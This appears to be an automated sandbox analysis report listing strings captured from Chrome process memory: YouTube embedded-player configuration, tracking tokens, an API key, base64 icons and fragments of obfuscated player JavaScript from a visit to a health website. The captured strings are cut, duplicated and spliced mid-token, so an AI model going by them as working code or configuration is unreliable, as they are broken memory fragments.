Source: chrome.exe, 00000000.00000003.2340748270.000028EC06CF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ,I=a(93,this),I.length>0&&U(k(I.length,2).concat(I),this,498,147),U(k(this.o+1>>1,1),this,498,244),U(k(this[wq].length,1),this,498),f=this.v6?a(86,this):M(126,this),f.length>0&&U(k(f.length,2).concat(f),this,141,227),D=M(141,this),D.length>4&&U(k(D.length,2).concat(D),this,498,226),v=0,v-=(Q=M(498,this).length,-2*~(Q&5)+-4-(Q|-6)-(~Q|5)),v+=a(369,this)&2047,L=E(this,437),L.length>4&&(v-=(VL=L.length,-2-~VL- -4)),v>0&&U(k(v,2).concat(RB(v)),this,498,150),x=12;else if(x==71)R=4,h(),x=74;else if(x==17)r++,x=18;else if(x==98)qv[b++]=X&255,X>>=8,x=11;else if(x==83)H=\"$\"+H,x=33;else if(x==23)x=64;else if(x==70)r5!==undefined?(x=r5,r5=undefined):x=8;else if(x==40)R=6,aB(255,this,Na,17),r5=8,x=62;else if(x==53)x=L.length>1E6?82:52;else if(x==68)x=r5!==undefined?62:87;else if(x==74)gq=w.next(),x=64;else if(x==51)c=T[r][this.FA](16),c.length==1&&(c=\"0\"+c),H+=c,x=17;else if(x==91)W++,x=94;else if(x==11)qv[b++]=X,x=91;else if(x==87)R=6,T=RB(2).concat(a(498,this)),T[1]=(sn=T[0],159-(sn&159)+(sn&-160)),T[3]=(Y=T[1],AJ=d[0],(Y|0)+(AJ|0)-2*(Y&AJ)),T[4]=(Tq=T[1],N=d[1],2*(~Tq&N)+(Tq|~N)-(~Tq|N)),H=this.xu(T),x=43;else if(x==64)x=gq.done?84:47;else if(x==78)this.Mg=qv,this.X=this.Mg.length<<3,p(294,this,[0,0,0]),x=90;else if(x==61)x=Z==dq?22:62;else if(x==82)L=L.slice(0,1E6),U([],this,498,102),Ma(7,498,this,[],135),x=52;else if(x==21)R=3,l=atob(C),W=0,qv=[],b=0,x=9;else if(x==9)x=94;else if(x==89)throw Q2;}}}catch(qa){if(R==(Q2=qa,19))throw qa;R==4?(Cb=qa,x=19):R==3?(Na=qa,x=40):R==6?(r5=89,x=62):R==99&&(r5=89,x=60)}}}(),S).xu=function(m,A,g,T,Z){return tq.call(this,77,32,m,A,g,T,Z)},S.jr=function(){return tq.call(this,77,12)},S).h0=0;var F_,KY=/./,Lb=Jq.pop.bind((u.prototype[oB]=[(S.Ef=(S.bS=0,function(){return n.call(this,34)}),0),0,1,1,0,1,1],u.prototype[CY])),zX=((F_=(KY[u.prototype.FA]=Lb,WC(\":\",5,{get:Lb},u.prototype.l)),u).prototype.NV=void 0,function(m,A){return(A=pY(78,55,22,94,null,\"error\",\"ad\"))&&m.eval(A.createScript(\"1\"))===1?function(g){return A.createScript(g)}:function(g){return\"\"+g}}(P));((cC=P.trayride||(P.trayride={}),cC.m>40)||(cC.m=41,cC.ad=sa,cC.a=Rj),cC).zfk_=function(m,A,g,T,Z,c,r,l){return[(l=new u(Z,r,A,c,m,T),function(w){return tq(77,5,false,l,w)}),function(w){l.Ef(w)}]};}).call(this);'].join('\\n')));}).call(this);","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2340748270.000028EC06CF2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ,I=a(93,this),I.length>0&&U(k(I.length,2).concat(I),this,498,147),U(k(this.o+1>>1,1),this,498,244),U(k(this[wq].length,1),this,498),f=this.v6?a(86,this):M(126,this),f.length>0&&U(k(f.length,2).concat(f),this,141,227),D=M(141,this),D.length>4&&U(k(D.length,2).concat(D),this,498,226),v=0,v-=(Q=M(498,this).length,-2*~(Q&5)+-4-(Q|-6)-(~Q|5)),v+=a(369,this)&2047,L=E(this,437),L.length>4&&(v-=(VL=L.length,-2-~VL- -4)),v>0&&U(k(v,2).concat(RB(v)),this,498,150),x=12;else if(x==71)R=4,h(),x=74;else if(x==17)r++,x=18;else if(x==98)qv[b++]=X&255,X>>=8,x=11;else if(x==83)H=\"$\"+H,x=33;else if(x==23)x=64;else if(x==70)r5!==undefined?(x=r5,r5=undefined):x=8;else if(x==40)R=6,aB(255,this,Na,17),r5=8,x=62;else if(x==53)x=L.length>1E6?82:52;else if(x==68)x=r5!==undefined?62:87;else if(x==74)gq=w.next(),x=64;else if(x==51)c=T[r][this.FA](16),c.length==1&&(c=\"0\"+c),H+=c,x=17;else if(x==91)W++,x=94;else if(x==11)qv[b++]=X,x=91;else if(x==87)R=6,T=RB(2).concat(a(498,this)),T[1]=(sn=T[0],159-(sn&159)+(sn&-160)),T[3]=(Y=T[1],AJ=d[0],(Y|0)+(AJ|0)-2*(Y&AJ)),T[4]=(Tq=T[1],N=d[1],2*(~Tq&N)+(Tq|~N)-(~Tq|N)),H=this.xu(T),x=43;else if(x==64)x=gq.done?84:47;else if(x==78)this.Mg=qv,this.X=this.Mg.length<<3,p(294,this,[0,0,0]),x=90;else if(x==61)x=Z==dq?22:62;else if(x==82)L=L.slice(0,1E6),U([],this,498,102),Ma(7,498,this,[],135),x=52;else if(x==21)R=3,l=atob(C),W=0,qv=[],b=0,x=9;else if(x==9)x=94;else if(x==89)throw Q2;}}}catch(qa){if(R==(Q2=qa,19))throw qa;R==4?(Cb=qa,x=19):R==3?(Na=qa,x=40):R==6?(r5=89,x=62):R==99&&(r5=89,x=60)}}}(),S).xu=function(m,A,g,T,Z){return tq.call(this,77,32,m,A,g,T,Z)},S.jr=function(){return tq.call(this,77,12)},S).h0=0;var F_,KY=/./,Lb=Jq.pop.bind((u.prototype[oB]=[(S.Ef=(S.bS=0,function(){return n.call(this,34)}),0),0,1,1,0,1,1],u.prototype[CY])),zX=((F_=(KY[u.prototype.FA]=Lb,WC(\":\",5,{get:Lb},u.prototype.l)),u).prototype.NV=void 0,function(m,A){return(A=pY(78,55,22,94,null,\"error\",\"ad\"))&&m.eval(A.createScript(\"1\"))===1?function(g){return A.createScript(g)}:function(g){return\"\"+g}}(P));((cC=P.trayride||(P.trayride={}),cC.m>40)||(cC.m=41,cC.ad=sa,cC.a=Rj),cC).zfk_=function(m,A,g,T,Z,c,r,l){return[(l=new u(Z,r,A,c,m,T),function(w){return tq(77,5,false,l,w)}),function(w){l.Ef(w)}]};}).call(this);'].join('\\n')));}).call(this);","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true}Url":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true},W=0,qv=[],b=0,x=9;else if(x==9)x=94;else if(x==89)throw Q2;}}}catch(qa){if(R==(Q2=qa,19))throw qa;R==4?(Cb=qa,x=19):R==3?(Na=qa,x=40):R==6?(r5=89,x=62):R==99&&(r5=89,x=60)}}}(),S).xu=function(m,A,g,T,Z){return tq.call(this,77,32,m,A,g,T,Z)},S.jr=function(){return tq.call(this,77,12)},S).h0=0;var F_,KY=/./,Lb=Jq.pop.bind((u.prototype[oB]=[(S.Ef=(S.bS=0,function(){return n.call(this,34)}),0),0,1,1,0,1,1],u.prototype[CY])),zX=((F_=(KY[u.prototype.FA]=Lb,WC(":",5,{get:Lb},u.prototype.l)),u).prototype.NV=void 0,fun
Source: chrome.exe, 00000000.00000003.2344254909.000028EC04B96000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ,\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FFU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2508320989.000028EC07F50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -player.vflset/www-embed-player.js\" name=\"embed_client\" id=\"base-js\" nonce=\"NJyqDsAj1TAa8VDP1RD_bg\"></script><script src=\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\" name=\"player/base\" nonce=\"NJyqDsAj1TAa8VDP1RD_bg\"></script><script nonce=\"\">writeEmbed();</script><script nonce=\"\">if (window.ytcsi) {ytcsi.infoGel({serverTimeMs: 43.0 }, '');}</script><noscript><div class=\"player-unavailable\"><h1 class=\"message\">An error occurred.</h1><div class=\"submessage\"><a href=\"https://www.youtube.com/watch?v=h15NcT6UXh0\" target=\"_blank\">Try watching this video on www.youtube.com</a>, or enable JavaScript if it is disabled in your browser.</div></div></noscript></body>","favicon":"","currentUrl":"https://fountainofhealth.ca/en","listArrString":[null,"https://www.youtube.com/watch?v=h15NcT6UXh0","https://www.youtube.com/watch?v=h15NcT6UXh0&embeds_referring_euri=https%3A%2F%2Ffountainofhealth.ca%2F"],"imgArrString":["https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR|data:image/png;base64,AA==","https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR|data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAADGCAYAAAAT+OqFAAAAdklEQVQoz42QQQ7AIAgEF/T/D+kbq/RWAlnQyyazA4aoAB4FsBSA/bFjuF1EOL7VbrIrBuusmrt4ZZORfb6ehbWdnRHEIiITaEUKa5EJqUakRSaEYBJSCY2dEstQY7AuxahwXFrvZmWl2rh4JZ07z9dLtesfNj5q0FU3A5ObbwAAAABJRU5ErkJggg==","https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR|data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGVuYWJsZS1iYWNrZ3JvdW5kPSJuZXcgMCAwIDI0IDI0IiBoZWlnaHQ9IjI0IiB2aWV3Qm94PSIwIDAgMjQgMjQiIHdpZHRoPSIyNCIgZmlsbD0iI2ZmZiI+PGc+PHBhdGggZD0iTTE2LjI0LDkuMTdMMTMuNDEsMTJsMi44MywyLjgzbC0xLjQxLDEuNDFMMTIsMTMuNDFsLTIuODMsMi44M2wtMS40MS0xLjQxTDEwLjU5LDEyTDcuNzYsOS4xN2wxLjQxLTEuNDFMMTIsMTAuNTkgbDIuODMtMi44M0wxNi4yNCw5LjE3eiBNNC45Myw0LjkzYy0zLjkxLDMuOTEtMy45MSwxMC4yNCwwLDE0LjE0YzMuOTEsMy45MSwxMC4yNCwzLjkxLDE0LjE0LDBjMy45MS0zLjkxLDMuOTEtMTAuMjQsMC0xNC4xNCBDMTUuMTcsMS4wMiw4LjgzLDEuMDIsNC45Myw0LjkzeiBNMTguMzYsNS42NGMzLjUxLDMuNTEsMy41MSw5LjIyLDAsMTIuNzNzLTkuMjIsMy41MS0xMi43Mywwcy0zLjUxLTkuMjIsMC0xMi43MyBDOS4xNSwyLjEzLDE0Ljg1LDIuMTMsMTguMzYsNS42NHoiIC8+PC9nPjwvc3ZnPg==","https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR|data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAADCCAYAAACIaaiTAAAAAXNSR0IArs4c6QAAARJJREFUOE9lyNdHBQAAhfHb3nvvuu2997jNe29TJJEkkkgSSSSJJJJEEkkiifRH5jsP56Xz8PM5gcC/xfCIWBNHiXiTQIlEk0SJZJNCiVRIM+mUyDCZlMgy2ZTIMbmUyDP5lCgwhZQoMsWUKDGllCgz5ZSogEpTRYlqU0OJoKmlRJ2pp0SDaaREk2mmRItppUSbaadEh+mkRBd0mx5K9Jo+SvSbAUoMmiFKDJsRSoyaMUqMmwlKhMwkJabMNCVmYNbMUSJsIpSImnlKLJhFSiyZZWoFVmEN1mEDNmELtmEHdmEP9uEADuEIjuEETuEMzuECLuEKruEGbuEO7uEBHuEJnuEFXuEN3uEDPuELvuEHfv8AoRErEi7Uc8UAAAAASUVORK5CYII="],"notVisible":false,"pdfViewerLoaded":false,"hasInputFields":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2341110796.000028EC06320000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2341110796.000028EC06320000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}kejpgkiemlaofpalmlakkmbjdnl/jquery-3.5.1.min.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2481950611.000028EC033E0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: .www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2505295670.000028EC07AAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504440794.000028EC078DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2505295670.000028EC07AAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504440794.000028EC078DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .www.youtube.com_KEY equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2370154176.000028EC062EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: /537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/FURi5aHgp1g?si\\u003dY2rCuE23jf8bkHaX\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGENPhrwUQgc3OHBDxnLAFEJmYsQUQ9v7_EhD-ns8cELCJzxwQuOTOHBDqo88cENeczxwQ5qDPHBCChLgiEJr0zhwQ37jOHBC-irAFEImEuCIQk4bPHBDcos8cEIiHsAUQvbauBRDk5_8SEODg_xIQpp3PHBDJ968FEPDizhwQr4__EhDhns8cELnZzhwQzInPHBCcm88cEPyyzhwQ_ZzPHBC36v4SEParsAUQvZmwBRDah4ATEN68zhwQi4KAExDdls8cELvZzhwQntCwBRCJsM4cEOugzxwQh6zOHBCI468FEMnmsAUQlP6wBRCZjbEFEOvo_hIQ7qDPHBD-8_8SEMzfrgUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNalUyTlRNM05qSTNNQT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxiLvvOcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI+a7znK23jQMVJnlMCB2AoyiC\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\"10.0\",\"platform\":\"DESKTOP\",\"interfaceName\":\"WEB_EMBEDDED_PLAYER\",\"interfaceVersion\":\"1.20250519.22.00\"},\"serializedExperimentIds\":\"24004644,24439361,24499532,24566687,51010235,51063643,51098299,51176511,51204329,51222973,51237842,51313767,51340662,51349914,51353393,51354
Source: chrome.exe, 00000000.00000003.2361454430.000028EC07F2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: /537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/gobWGqPjLSQ?si\\u003dE-htCYBt9m3YW0ws\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGELnZzhwQ7aDPHBC9mbAFEN68zhwQ66DPHBDmoM8cEIiHsAUQpp3PHBCJsM4cEOvo_hIQr4__EhDk5_8SENyizxwQ9quwBRDdls8cEJmYsQUQ37jOHBDxnLAFEP2czxwQvoqwBRCHrM4cEIjjrwUQ4Z7PHBD-ns8cEODg_xIQiIS4IhCThs8cEIHNzhwQ2oeAExCa9M4cEJybzxwQmY2xBRCe0LAFEPyyzhwQvbauBRCLgoATEMzfrgUQ0-GvBRD-8_8SELvZzhwQyeawBRDqo88cEMyJzxwQt-r-EhCwic8cEIOEuCIQ9v7_EhCU_rAFENeczxwQuOTOHBDw4s4cEMn3rwUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNakEwTnpNd05UVTVOZz09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxiC1vOcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMIx8HznK23jQMV42xMCB1cST25\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\"10.0\",\"platform\":\"DESKTOP\",\"interfaceName\":\"WEB_EMBEDDED_PLAYER\",\"interfaceVersion\":\"1.20250519.22.00\"},\"serializedExperimentIds\":\"24004644,24439361,24499532,24566687,51010235,51063643,51098299,51176511,51204329,51222973,51237842,51313767,51340662,51349914,51353393,51354
Source: chrome.exe, 00000000.00000003.2323304427.000028EC06A9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 0519.22.00\",\"INNERTUBE_CONTEXT\":{\"client\":{\"hl\":\"en\",\"gl\":\"US\",\"remoteHost\":\"191.101.61.23\",\"deviceMake\":\"\",\"deviceModel\":\"\",\"visitorData\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/FURi5aHgp1g?si\\u003dY2rCuE23jf8bkHaX\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGENPhrwUQgc3OHBDxnLAFEJmYsQUQ9v7_EhD-ns8cELCJzxwQuOTOHBDqo88cENeczxwQ5qDPHBCChLgiEJr0zhwQ37jOHBC-irAFEImEuCIQk4bPHBDcos8cEIiHsAUQvbauBRDk5_8SEODg_xIQpp3PHBDJ968FEPDizhwQr4__EhDhns8cELnZzhwQzInPHBCcm88cEPyyzhwQ_ZzPHBC36v4SEParsAUQvZmwBRDah4ATEN68zhwQi4KAExDdls8cELvZzhwQntCwBRCJsM4cEOugzxwQh6zOHBCI468FEMnmsAUQlP6wBRCZjbEFEOvo_hIQ7qDPHBD-8_8SEMzfrgUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNalUyTlRNM05qSTNNQT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxiLvvOcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI+a7znK23jQMVJnlMCB2AoyiC\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\
Source: chrome.exe, 00000000.00000002.2493480651.000028EC04191000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 0519.22.00\",\"INNERTUBE_CONTEXT\":{\"client\":{\"hl\":\"en\",\"gl\":\"US\",\"remoteHost\":\"191.101.61.23\",\"deviceMake\":\"\",\"deviceModel\":\"\",\"visitorData\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/h15NcT6UXh0?si\\u003dYrXkudamh5IoggTR\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGEODg_xIQgc3OHBCIhLgiEIeszhwQ2oeAExDM364FEOugzxwQvoqwBRCvj_8SEN68zhwQ3ZbPHBD8ss4cEP7z_xIQpp3PHBDT4a8FEIjjrwUQ3KLPHBDhns8cEP2czxwQ5qDPHBDMic8cEL2ZsAUQ37jOHBC52c4cEParsAUQvbauBRCZjbEFEO2gzxwQ8OLOHBDJ968FEOvo_hIQmZixBRCcm88cEPGcsAUQyeawBRC72c4cEJr0zhwQsInPHBDXnM8cEOqjzxwQuOTOHBCe0LAFEIOEuCIQ9v7_EhCJsM4cEP6ezxwQk4bPHBDk5_8SELfq_hIQiIewBRCLgoATEJT-sAUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome